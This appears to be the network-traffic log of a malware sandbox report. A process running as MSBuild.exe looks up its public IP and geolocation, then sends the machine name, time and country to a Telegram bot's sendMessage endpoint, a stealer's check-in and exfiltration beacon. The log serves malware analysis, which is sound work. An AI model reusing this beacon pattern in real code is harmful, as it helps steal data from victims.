                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:39.297323942 CEST745INHTTP/1.1 504 Gateway Time-out
                                                        Date: Wed, 25 Sep 2024 16:50:39 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 557
                                                        Connection: keep-alive
                                                        X-Request-ID: 5f5fde12d0a866917fccf6345605cb29
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.749727158.101.44.242807860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 18:50:39.517070055 CEST151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Sep 25, 2024 18:50:42.078614950 CEST320INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:42 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: faf00e6c2cea12e0256b96613bad7db6
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.749705188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:27 UTC674INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:27 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35086
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwEgUjtitTROSfoT4xJ9il9p2K24fMcxnlr4wWB0UpZ1hJ5ycYFE2vDqnvWkC493%2FcoapKwtpu2KY1GqEuvEQhEKCz7%2B2Mkbm8Q3L3gte0DHbWlAsPyGgoTQf57U8DigyaSDZ93t"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c8368ca5843a0-EWR
                                                        2024-09-25 16:50:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.749707188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-09-25 16:50:28 UTC676INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:28 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35087
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9HmY26FwG98ERtMUtE7kUJ5l4IgZcBnUp4D47Vx6iBC0GRjcHExbsW1Js%2FRQTixP%2FTUU2kaBZMseStsy0f1316JG7FJvsFTaXx%2F2k6GWDTpKCH8HVm6lRdz3yYAxxSwBlSKVmAu"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c836eac274269-EWR
                                                        2024-09-25 16:50:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.749709188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-09-25 16:50:29 UTC682INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:29 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35088
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLQ57pKh9r25Q6Ta5elgjx%2FZ9wxg5jLOzV%2BxRaCojBK87PolVPqFjTmgGZVKTs7rBYvnuN98MFFJPwxS9R%2BFxhUzsXbhnyggh6jJz%2BGd0kBjKNsVyl%2FTrZt%2FjLuDu3JRkR44l1mm"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c837728218c0b-EWR
                                                        2024-09-25 16:50:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.749711188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-09-25 16:50:30 UTC676INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:30 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35089
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulLCOO87GEVHOuy9cVTdzfNQX3Eu5fUKEbrcJN%2FdpENcNPXCrksNyZ4RIv3QwZFzbCBC5MKNGeVSPFnY%2FvnmDMIw6TkkIhvOwmTrxAvNPUR1usn8I%2FXtJBmkBfrVPNFOrKyGHKWQ"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c837efa1ec431-EWR
                                                        2024-09-25 16:50:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.749713188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:32 UTC678INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:32 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35091
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SFMEW%2BpvEf19J4r6rrcIkc4Zwlx4i6PBNmZeH3lNgx%2Bl8OOWABcgTi8qbLYeU5f5FYlNUPcgthmD0vEm%2BtDge8TnREqH3FahRrVh26%2FIEod2yJklCKQtauvUn8CroILQ4wpp7u7"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c83870c244374-EWR
                                                        2024-09-25 16:50:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.749717188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:33 UTC678INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:33 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35092
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PG2iH4cstHf681j0Q2ikB%2FAidj9C%2BCkpKMwQ278qMHDwNwsJJcWLd9x7LrV6JebB0ZmiQPZNl4fJOxAyFjmVZi9FYDKOtVA6wPkJdUQmMCDOInnFa7J%2Fb2jc58%2BnJ5MbiFanmssP"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c838eda00423d-EWR
                                                        2024-09-25 16:50:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.749721188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:35 UTC706INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:35 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35094
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsiM6toJKgJaiwPD75SQlgNnMP2gWLbDplQBCjEgxPRa2DxrlkzGJ9go2WUA2ingy9Yu2Vzz98v0E%2BBzSOcgVpy1x5iucuVqKhYnEAOu%2FixrK41usPQXLCwjDHi0epoSwdwp4TCK"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c839cad1517a1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-25 16:50:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.749731188.114.96.34437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:42 UTC680INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Sep 2024 16:50:42 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 35101
                                                        Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPMXJo5QJwJxtBok5I5RfkiTF%2BCifPZfneGAr8Fd7OS3rk2zs54rvui7AK1KZoWq5OZNqAr2m%2BeJPqXj%2BZXv828YnJXTj4v5%2BMsjqIuRC39yfpQLdP5pPfwXFyD7b8VXma%2BX7Ry4"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c8c83c8b97dc459-EWR
                                                        2024-09-25 16:50:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-25 16:50:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.749732149.154.167.2204437860C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 16:50:43 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: Keep-Alive
                                                        2024-09-25 16:50:43 UTC344INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 25 Sep 2024 16:50:43 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 55
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2024-09-25 16:50:43 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                        TimestampSource PortDest PortSource IPDest IPCommands
